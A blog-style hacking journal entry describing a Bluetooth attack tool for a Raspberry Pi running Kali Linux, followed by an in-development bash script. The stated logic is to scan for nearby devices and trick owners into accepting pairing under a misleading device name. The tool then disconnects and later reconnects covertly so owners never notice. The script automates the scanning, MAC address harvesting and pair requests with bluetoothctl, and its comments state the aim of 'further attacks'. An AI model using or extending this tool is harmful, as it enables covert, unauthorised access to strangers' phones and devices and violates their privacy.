Raspberry Pi 3 – Kali Linux – Bluetooth Hacking Journal 4 – Automated Scanning and Connecting

Program Logic

  1. Scan for bluetooth devices continuously
  2. Connect to new mac addresses automatically until pairing is accepted
    • Call your bluetooth something not so suspicious. For example, ‘Wilmu bluetooth terms of service’
  3. Immediately disconnect once connected, from then on the device will pair without being in discoverable mode
  4. Wait five minutes so that if the user of the bluetooth device isn’t trying to put it in discoverable mode anymore and/or pair with things then they aren’t using it
  5. Reconnect, if it’s a cell phone, they will have no indication that it’s been reconnected. You can now connect to this device without the user knowing anymore.

Program in Development

#!/bin/bash
#The purpose of this tool is to automatically scan an area for bluetooth devices and to try and connect to them. After a successful connection it will immediately disconnect and record devices that have been successfully connected to for the purpose of further attacks using other programs or manual attacks. Typically, once the mac for a bluetooth device has been discovered, connections can be manually attempted via bluetoothctl connect command, even if the bluetooth device is no longer in a discoverable mode. If the target device is successfully connected, it can then typically be connected to at a later time without the owner knowing as there will be no additional security checks. This has been tested using an android cell phone and rukus bluetooth speakers.

#Chose not to do the below because once data is removed from bluetoothctl you can no longer connect to devices that were detected.
#All pre-existing devices are removed from bluetoothctl so that anything found won't be mistaken for something that is old.
#echo
#echo ------- removing all previously found devices on bluetoothctl
#echo
#echo "remove *" | bluetoothctl
#sleep 1
#Scan is turned off initially in the case that it is already on, it will not run a new scan and find new bluetooth devices.
echo
echo ------- turning bluetoothctl scan off
echo
echo "scan off" | bluetoothctl
sleep 1
turn scan on and wait 5 seconds for it to run and search nearby devices.
echo
echo ------- turning bluetoothctl scan on
echo
echo "scan on" | bluetoothctl
sleep 10
#removes the already existing devices.txt file if there is one, otherwise the devices.txt file will just get appended to and we only want to make an array using new bluetooth addresses. We don't want the array to contain bluetooth macs for devices that may no longer be in the area.
echo
echo ------- removing devices.txt
sleep 1
echo
rm devices.txt
#run bluetoothctl scan and export the mac addresses found, minus xx:xx:xx:xx:xx:xx (redacted) which is the raspberry's mac, into a text file called devices.txt
echo
echo ------- scanning for bluetooth devices and generating a new devices.txt list
sleep 1
echo
echo "scan on" | bluetoothctl | awk '$0 !~ /xx:xx:xx:xx:xx:xx/' >> devices.txt
#echo "devices" | bluetoothctl | awk '$0 !~ /Controller/' >> devices.txt
#hcitool scan >> devices.txt
sleep 10
#makes an array by searching for mac addresses in the devices.txt file. Each element in the array is a mac address.
echo
echo ------- making array of mac addresses found with bluetoothctl scan using devices.txt
arr=($(grep -o -E "([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}" devices.txt))
sleep 2
#says that the array is going to be printed
echo
echo ------- printing array for troubleshooting purposes
sleep 1
#prints the whole array to verify it's working
echo ${arr[*]}
echo "agent on" | bluetoothctl
echo "pair ${arr[0]}" | bluetoothctl
sleep 2
echo "yes" | bluetoothctl